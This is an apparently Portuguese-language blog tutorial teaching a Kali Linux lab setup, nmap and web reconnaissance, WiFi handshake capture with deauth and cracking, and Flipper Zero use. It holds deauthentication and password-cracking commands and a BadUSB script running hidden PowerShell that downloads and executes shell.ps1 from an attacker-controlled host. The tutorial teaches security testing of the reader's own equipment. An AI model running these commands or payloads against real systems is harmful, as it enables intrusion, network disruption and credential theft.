Menu
Início Artigos {{t.nav.bookmarks}} {{t.nav.experience}} {{t.nav.profiles}} Sobre Trabalhe Comigo
Linux terminal with code
Segurança 7 mar, 2026 • 25 min de leitura

Fundamentos do Kali Linux: Construa Seu Laboratório de Hacking

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

Compartilhar:
Lee Foropoulos

Lee Foropoulos

25 min de leitura

Continue where you left off?
Text size:

Contents

O Caminho do Hacker: Série em 5 Partes

Parte 1: IntroduçãoParte 2: Domínio do FlipperParte 3: Fundamentos do KaliParte 4: ExploraçãoParte 5: A Auditoria Completa

Nas Partes 1 e 2, você clonou cartões, analisou frequências de rádio e entendeu por que a maior parte da "segurança" é teatro. Você viu as vulnerabilidades de fora. Agora entra dentro e as vê da perspectiva do atacante.

O Kali Linux é a distribuição padrão da indústria para testes de penetração. Vem pré-carregado com mais de 600 ferramentas de segurança. Isso pode parecer esmagador. A maioria dos tutoriais te joga na parte funda com comandos que você não entende e sem contexto sobre por que importam.

Estamos fazendo isso de forma diferente. No final deste artigo, você terá um laboratório funcional, entenderá reconhecimento de rede em nível fundamental e terá capturado seu próprio WiFi handshake. Cada passo se constrói sobre o anterior.

A maioria dos tutoriais te joga na parte funda com comandos que você não entende e sem contexto sobre por que importam. Cada passo aqui se constrói sobre o anterior.

Parte 1: Construindo Seu Laboratório

Testadores de penetração profissionais não rodam Kali na máquina principal. Eles usam ambientes isolados que podem ser resetados, ter snapshots e ser destruídos sem afetar o sistema primário. Você fará o mesmo.

Opção A: Máquina Virtual (Recomendada para Aprendizado)

Uma máquina virtual oferece o ambiente de aprendizado mais seguro. Você pode salvar snapshots do seu progresso, cometer erros e voltar instantaneamente.

O Que Você Vai Precisar

  • Máquina host: 16GB+ RAM, 50GB+ de espaço livre em disco, CPU moderna com suporte a virtualização
  • Software de virtualização: VirtualBox (gratuito) ou VMware Workstation Player (gratuito para uso pessoal)
  • Kali Linux: VM pré-construída oficial de kali.org

Projeto: Setup da Kali VM

Tempo: 30-45 minutos

Passos:

  1. Baixe a imagem VM do Kali para seu hypervisor (VirtualBox ou VMware)
  2. Extraia o arquivo baixado (7-Zip recomendado para Windows)
  3. Importe a VM no seu hypervisor
  4. Configure recursos: mínimo 4GB RAM (8GB recomendado), 2+ núcleos de CPU
  5. Habilite o adaptador de rede em modo "Bridged" para acesso completo à rede
  6. Inicie a VM e faça login com credenciais padrão: kali / kali
  7. Abra o terminal e execute: sudo apt update && sudo apt full-upgrade -y
  8. Crie um snapshot chamado "Fresh Install" para fácil recuperação

Verificação de sucesso: Você pode abrir um terminal, rodar whoami e ver kali.

Opção B: Hardware Dedicado (Para Prática Séria)

Quando estiver confortável com o Kali, hardware dedicado remove o overhead da VM e habilita acesso completo ao hardware, essencial para testes wireless.

Recomendações de Hardware

Opção econômicaThinkPad X230/T430 usado ($100-150), WiFi Intel substituído por Atheros AR9285
Opção modernaFramework Laptop com módulo WiFi compatível com Linux
Sensor dedicadoRaspberry Pi 5 4GB com adaptador externo Alfa AWUS036ACH

Por enquanto, uma VM é perfeita. Hardware dedicado se torna importante quando você precisa de modo monitor para testes wireless (abordado mais adiante neste artigo).

Opção C: Live USB (Zero Persistência)

Um Live USB roda Kali diretamente sem instalação. Tudo desaparece quando você desliga. Útil para testar em hardware diferente, mas você perderá seu trabalho a cada sessão, a menos que crie uma partição persistente.

bash
1# Create bootable USB on Linux/Mac
2sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
3# Replace sdX with your USB device (check with 'lsblk')
4# On Windows: Use Rufus or balenaEtcher

dd Destrói Dados

O comando dd escreve diretamente no disco sem confirmação. Verifique o nome do dispositivo três vezes. Escrever no dispositivo errado vai apagar aquele drive completamente.

Kali Linux terminal with security tools running
Um ambiente Kali Linux configurado corretamente é a fundação de cada teste de penetração profissional.

Parte 2: A Mentalidade do Terminal

Antes de tocar em ferramentas de segurança, você precisa estar confortável no terminal. Isso não é opcional. A GUI existe no Kali, mas o trabalho real acontece na linha de comando.

bash
1# Know where you are
2pwd                    # Print working directory
3
4# Move around
5cd /home/kali          # Go to home directory
6cd ..                  # Go up one level
7cd -                   # Go to previous directory
8
9# See what's here
10ls                     # List files
11ls -la                 # List all files with details
12ls -lah                # Human-readable sizes
13
14# Read files
15cat filename           # Display entire file
16less filename          # Scrollable view (q to quit)
17head -n 20 filename    # First 20 lines
18tail -f filename       # Follow file in real-time (logs)

Escalação de Privilégios

Muitas ferramentas de segurança requerem acesso root. No Kali, sudo dá privilégios root temporários.

bash
1sudo command           # Run single command as root
2sudo -i                # Start root shell (be careful)
3whoami                 # Check current user
4id                     # Show user and group IDs

Root com Responsabilidade

Rodar como root significa zero redes de segurança. Um erro de digitação como rm -rf / vai destruir tudo. O Kali moderno previne esse comando específico, mas o princípio permanece: entenda o que está rodando antes de rodar.

Gerenciamento de Processos

bash
1ps aux                 # All running processes
2top                    # Real-time process viewer
3htop                   # Better process viewer (install if needed)
4
5# Control processes
6ctrl+c                 # Stop current process
7ctrl+z                 # Suspend process
8bg                     # Resume in background
9fg                     # Bring to foreground
10
11# Kill processes
12kill PID               # Graceful termination
13kill -9 PID            # Force kill (last resort)

Comandos de Rede

bash
1ip a                   # Show network interfaces
2ip route               # Show routing table
3ping -c 4 8.8.8.8     # Test connectivity
4curl ifconfig.me       # Your public IP
5
6# DNS lookups
7nslookup google.com
8dig google.com

Projeto: Orientação no Terminal

Tempo: 15 minutos

Tarefas:

  1. Encontre seu endereço IP na rede local usando ip a
  2. Identifique seu gateway padrão usando ip route
  3. Faça ping no seu gateway para confirmar conectividade
  4. Liste todos os arquivos em /etc ordenados por tempo de modificação: ls -lt /etc | head
  5. Leia as primeiras 50 linhas de /etc/passwd: head -n 50 /etc/passwd

Objetivo: Você deve ser capaz de navegar, verificar status de rede e ler arquivos sem pensar.

Parte 3: Reconhecimento de Rede com Nmap

Nmap (Network Mapper) é a ferramenta mais importante que você vai aprender. Descobre hosts, identifica serviços, detecta sistemas operacionais e mapeia topologia de rede. Todo o resto se constrói sobre a saída do nmap.

Seu Primeiro Scan

Vamos escanear sua própria rede. Primeiro, identifique o range da sua rede:

bash
1# Find your local IP and subnet
2ip a | grep inet
3# Look for something like: inet 192.168.1.100/24
4# The /24 means your network is 192.168.1.0-255
bash
1# Basic discovery scan (your network only)
2sudo nmap -sn 192.168.1.0/24
3
4# What this does:
5# -sn = ping scan (no port scanning, just host discovery)
6# /24 = scan all 256 addresses in this subnet

Você verá uma saída assim:

text
1Nmap scan report for 192.168.1.1
2Host is up (0.0025s latency).
3MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
4
5Nmap scan report for 192.168.1.50
6Host is up (0.0042s latency).
7MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

Esse primeiro scan te diz: "Esses dispositivos existem na minha rede." Agora vamos fazer perguntas mais profundas.

Detecção de Serviços

Quando sabe quais hosts existem, você quer saber quais serviços estão rodando.

bash
1# Scan a single target for open ports and services
2sudo nmap -sV 192.168.1.1
3# -sV = Version detection (probe open ports for service info)

Saída comum:

text
1PORT     STATE SERVICE  VERSION
222/tcp   open  ssh      OpenSSH 8.4p1
380/tcp   open  http     nginx 1.18.0
4443/tcp  open  ssl/http nginx 1.18.0

Detecção de Sistema Operacional

bash
1# Detect OS (requires root)
2sudo nmap -O 192.168.1.1
3
4# Combined scan: OS detection + service versions + default scripts
5sudo nmap -A 192.168.1.1

Entendendo Estados de Portas

O Nmap reporta portas em vários estados:

  • open - Aplicação aceitando conexões ativamente. É isso que atacantes procuram.
  • closed - Porta acessível mas nenhuma aplicação ouvindo. O host está ativo mas não tem nada lá.
  • filtered - Firewall ou filtro bloqueando a sonda. Não é possível determinar se está aberta ou fechada.
  • unfiltered - Porta acessível mas o nmap não consegue determinar se está aberta ou fechada.

Tipos de Scan e Furtividade

bash
1# TCP Connect scan (default, noisy but reliable)
2sudo nmap -sT target
3
4# SYN scan (stealthier, default with root)
5sudo nmap -sS target
6
7# UDP scan (slow but important - many services use UDP)
8sudo nmap -sU target
9
10# Scan all 65535 ports (thorough but slow)
11sudo nmap -p- target
12
13# Scan specific ports
14sudo nmap -p 22,80,443,8080 target
15
16# Top 1000 common ports (default behavior)
17sudo nmap target

Nmap Scripting Engine (NSE)

O NSE estende o nmap com scripts especializados para detecção de vulnerabilidades, enumeração de serviços e mais.

bash
1# Run default safe scripts
2sudo nmap -sC target
3
4# Check for vulnerabilities
5sudo nmap --script vuln target
6
7# SMB enumeration (Windows shares)
8sudo nmap --script smb-enum-shares target
9
10# HTTP enumeration
11sudo nmap --script http-enum target
12
13# List available scripts
14ls /usr/share/nmap/scripts/ | head -20

Projeto: Mapeie Sua Rede

Tempo: 30 minutos

Pré-requisitos: Conhecer o range da sua rede a partir de ip a

  1. Descubra todos os hosts: sudo nmap -sn YOUR_NETWORK/24
  2. Liste os hosts descobertos e seus endereços MAC
  3. Escolha seu roteador (geralmente .1) e execute: sudo nmap -sV -sC YOUR_ROUTER
  4. Identifique todas as portas abertas e serviços no seu roteador
  5. Execute sudo nmap -A YOUR_COMPUTER para ver o que sua máquina expõe

Documente: Crie um arquivo texto listando cada dispositivo, seu IP, MAC e serviços. Este é seu mapa de rede.

Escaneie Apenas Redes que Você Possui

Escanear redes sem autorização é ilegal na maioria das jurisdições. Até um scan nmap simples pode ser considerado acesso não autorizado. Fique na sua própria rede, seus próprios equipamentos e redes onde você tem permissão escrita explícita.

Parte 4: Reconhecimento Web

Seu scan nmap provavelmente encontrou serviços HTTP (portas 80, 443, 8080). Vamos entender o que está rodando lá.

Whatweb: Identificação Rápida de Serviço

bash
# Identify web technologies
whatweb http://192.168.1.1

Exemplo de saída:

text
1http://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
2HTTPServer[nginx/1.18.0], IP[192.168.1.1],
3Title[Router Admin], nginx[1.18.0]

Nikto: Scanner de Vulnerabilidades Web

bash
1# Scan for common web vulnerabilities
2nikto -h http://192.168.1.1
3
4# This checks for:
5# - Outdated server software
6# - Dangerous files/CGIs
7# - Misconfigurations
8# - Default credentials

Enumeração de Diretórios: O Que Está Escondido?

Servidores web frequentemente têm diretórios não linkados da página principal: painéis de admin, arquivos de configuração, arquivos de backup.

bash
# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

Descobertas comuns:

text
1/admin   (Status: 301)
2/backup  (Status: 403)
3/config  (Status: 200)
4/login   (Status: 200)

Localização das Wordlists

O Kali inclui wordlists extensas em /usr/share/wordlists/. Os diretórios mais comuns: dirb/, dirbuster/, rockyou.txt (senhas) e seclists/ (coleção abrangente).

Projeto: Audite a Interface Web do Seu Roteador

Tempo: 20 minutos

  1. Execute whatweb http://YOUR_ROUTER_IP para identificar o servidor
  2. Execute nikto -h http://YOUR_ROUTER_IP para verificar vulnerabilidades
  3. Execute gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt
  4. Visite os diretórios descobertos em um navegador
  5. Anote painéis de admin, números de versão ou descobertas interessantes

Descoberta comum: Páginas de admin do roteador expostas com credenciais padrão.

Server room with network infrastructure
O reconhecimento de rede revela a topologia completa do ambiente alvo, de roteadores a serviços escondidos.

Parte 5: Reconhecimento Wireless

Aqui as coisas ficam interessantes. Redes WiFi transmitem constantemente, e com as ferramentas certas, você pode capturar handshakes de autenticação: a troca criptografada que acontece quando um dispositivo se conecta.

Requisitos de Hardware

Seu WiFi integrado provavelmente não vai funcionar para isso. Você precisa de um adaptador que suporte modo monitor e injeção de pacotes. Recomendados: Alfa AWUS036ACH ($50) ou Alfa AWUS036ACM ($45). Funcionam direto da caixa com o Kali.

Entendendo o Modo Monitor

O modo WiFi normal ("managed mode") só recebe pacotes endereçados ao seu dispositivo. O modo monitor captura todos os pacotes no alcance, o tráfego de cada dispositivo no canal.

bash
1# Check your wireless interfaces
2iwconfig
3# Look for your adapter (often wlan0 or wlan1)
4
5# Kill interfering processes
6sudo airmon-ng check kill
7
8# Enable monitor mode
9sudo airmon-ng start wlan0
10# Your interface is now wlan0mon

Escaneando Redes

bash
1# Start capturing wireless traffic
2sudo airodump-ng wlan0mon
3
4# You'll see:
5# BSSID  = Router MAC address
6# PWR    = Signal strength (higher = closer)
7# CH     = Channel
8# ENC    = Encryption (WPA2, WPA3, OPN)
9# ESSID  = Network name
10
11# Press Ctrl+C to stop

O que você está vendo é cada rede WiFi no alcance, suas configurações de segurança e frequentemente os dispositivos conectados. É isso que um war driver vê ao escanear bairros.

Capturando um Handshake

Quando um dispositivo se conecta a uma rede WPA2, há um four-way handshake. Se você capturar esse handshake, pode tentar crackear a senha offline.

bash
1# Focus on your target network (your own network!)
2sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
3# -c CHANNEL = Target's channel from previous scan
4# --bssid = Target router's MAC address
5# -w capture = Save to files starting with "capture"
6
7# Now wait for a device to connect...
8
9# Or force a reconnection (on YOUR network only):
10# In a new terminal:
11sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
12# This sends 5 deauth packets, disconnecting clients
13# They automatically reconnect, generating a handshake

Quando você captura um handshake, o airodump-ng mostra [ WPA handshake: XX:XX:XX:XX:XX:XX ] no canto superior direito.

Ataques Deauth São Ilegais

Enviar pacotes de desautenticação para redes que não são suas é crime federal sob o Computer Fraud and Abuse Act (nos EUA) e leis similares em outros lugares. Teste apenas na sua própria rede. O objetivo é entender a vulnerabilidade, não atacar outros.

Crackeando o Handshake

Com um handshake capturado, você pode tentar crackear a senha offline usando uma wordlist:

bash
1# Crack using a wordlist
2aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
3
4# If the password is in the wordlist, you'll see:
5# KEY FOUND! [ password123 ]
6
7# For stronger passwords, use hashcat (GPU-accelerated)
8# First, convert capture format:
9cap2hccapx capture-01.cap capture.hccapx
10
11# Then crack with hashcat:
12hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
Senhas reais de vazamentos de dados reais estão incluídas no rockyou.txt, a wordlist padrão usada para crackear WiFi handshakes capturados.

Verificação de Realidade sobre Força de Senhas

rockyou.txt contém 14+ milhões de senhas de vazamentos de dados reais. Se sua senha WiFi é "password123" ou "summer2024" ou o nome do seu cachorro, pode ser crackeada em segundos. Uma senha aleatória de 12+ caracteres levaria milhões de anos para brute-force.

Projeto: Teste a Segurança do Seu WiFi

Tempo: 45 minutos

Pré-requisitos: Adaptador WiFi externo com suporte a modo monitor

  1. Habilite o modo monitor: sudo airmon-ng start wlan0
  2. Escaneie as redes: sudo airodump-ng wlan0mon
  3. Anote o canal e BSSID da sua rede
  4. Capture no seu canal: sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
  5. Reconecte um dispositivo ao seu WiFi (ou use deauth na SUA rede)
  6. Confirme a captura do handshake
  7. Teste contra o rockyou.txt: aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

Resultado: Se sua senha foi encontrada, mude imediatamente para algo aleatório e longo (20+ caracteres).

Parte 6: Conectando Seu Flipper Zero

Lembra de todas aquelas capturas da Parte 2? Vamos integrá-las ao seu workflow com o Kali.

Transferindo Arquivos

bash
1# Connect Flipper via USB
2# It appears as a mass storage device
3
4# Mount if not auto-mounted
5sudo mount /dev/sda1 /mnt/flipper
6
7# Your captures are in:
8/mnt/flipper/subghz/       # Sub-GHz captures
9/mnt/flipper/nfc/          # NFC dumps
10/mnt/flipper/infrared/     # IR captures
11/mnt/flipper/lfrfid/       # 125kHz RFID
12/mnt/flipper/badusb/       # BadUSB scripts

Analisando Dumps NFC

bash
1# Install libnfc tools
2sudo apt install libnfc-bin mfoc mfcuk
3
4# Flipper saves NFC as .nfc text format
5# Convert to binary for analysis:
6python3 flipper_nfc_to_mfd.py card.nfc card.mfd
7
8# Analyze MIFARE Classic dump
9hexdump -C card.mfd | less

Análise Sub-GHz

bash
1# Flipper's .sub files are text-based
2cat garage_door.sub
3
4# Contains:
5# - Frequency (315MHz, 433MHz, etc.)
6# - Protocol or RAW data
7# - Timing information
8
9# For deeper RF analysis, use:
10# - Universal Radio Hacker (URH)
11# - GNU Radio
12# - rtl_433 (with SDR hardware)

Desenvolvimento BadUSB

Crie payloads BadUSB no Kali, teste no Flipper:

bash
1# Flipper uses DuckyScript-compatible syntax
2# Create payload on Kali:
3cat > kali_connect.txt << 'EOF'
4DELAY 1000
5GUI r
6DELAY 500
7STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
8ENTER
9EOF
10
11# Host the payload from Kali:
12python3 -m http.server 8000
13
14# Copy to Flipper's badusb folder
15cp kali_connect.txt /mnt/flipper/badusb/

Payloads BadUSB São Poderosos

Esses scripts se executam automaticamente quando plugados. Um payload malicioso pode instalar backdoors, roubar credenciais ou destruir dados em segundos. Use apenas nas suas próprias máquinas para testes. Nunca deixe seu Flipper onde outra pessoa possa plugá-lo.

Parte 7: Documentação e Workflow

Testadores de penetração profissionais não apenas rodam ferramentas. Eles documentam tudo. Boa documentação separa amadores de profissionais.

Anotações com CherryTree

bash
1# Install CherryTree (hierarchical note-taking)
2sudo apt install cherrytree
3
4# Organize notes by:
5# - Target/network
6# - Reconnaissance
7# - Enumeration
8# - Vulnerabilities
9# - Exploitation attempts
10# - Post-exploitation

Salvando Saída do Nmap

bash
1# Save in all formats
2sudo nmap -sV -sC -oA scan_results target
3
4# Creates:
5# scan_results.nmap (human-readable)
6# scan_results.xml  (parseable)
7# scan_results.gnmap (greppable)

Log de Sessão

bash
1# Log entire terminal session
2script session_$(date +%Y%m%d_%H%M%S).log
3
4# Now every command and output is recorded
5# Type 'exit' to stop logging

O Caminho do Hacker

Uma série em 5 partes que te leva de curioso a capaz.

Parte 1: Introdução Parte 2: Domínio do Flipper Parte 3: Fundamentos do Kali ✓ Parte 4: Exploração Parte 5: Auditoria Completa

Checklist da Parte 3

☐ Setup do Lab: Kali VM rodando, atualizada, snapshot salvo

☐ Terminal: Confortável com navegação, permissões, controle de processos

☐ Nmap: Rede mapeada, serviços identificados, roteador escaneado

☐ Recon Web: Interface web do roteador analisada com whatweb/nikto

☐ Wireless: Modo monitor habilitado, redes escaneadas

☐ Handshake: Próprio WiFi handshake capturado e testado

☐ Flipper: Arquivos transferidos, workflow compreendido

☐ Documentação: Notas organizadas, scans salvos

Plano de Ação Fundamentos do Kali 0/6

O Que Vem Depois

Você construiu seu laboratório e aprendeu a fase de reconhecimento. Pode descobrir hosts, identificar serviços e capturar handshakes wireless. Entende o que atacantes veem quando olham para uma rede.

Na Parte 4, passamos do reconhecimento para a exploração. Você vai aprender:

  • Metasploit Framework, o canivete suíço da exploração
  • Workflows comuns de exploração de vulnerabilidades
  • Técnicas de pós-exploração: o que acontece após o acesso inicial
  • Escalação de privilégios: de usuário normal a administrador
  • Pivoting: usar um sistema comprometido para atacar outros

O reconhecimento te diz onde estão as portas. A exploração te ensina como atravessá-las.

Você mapeou o território. Agora aprende a navegar nele. A Parte 4 te leva de observador a operador.

Nos vemos na Parte 4.

How was this article?

Compartilhar

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Nao perca nenhuma publicacao

Receba notificacoes quando novos artigos forem publicados. Sem necessidade de email.

Voce vera um banner no site quando houver um novo post, alem de uma notificacao do navegador se permitir.

Apenas notificacoes do navegador. Sem spam.

0 / 0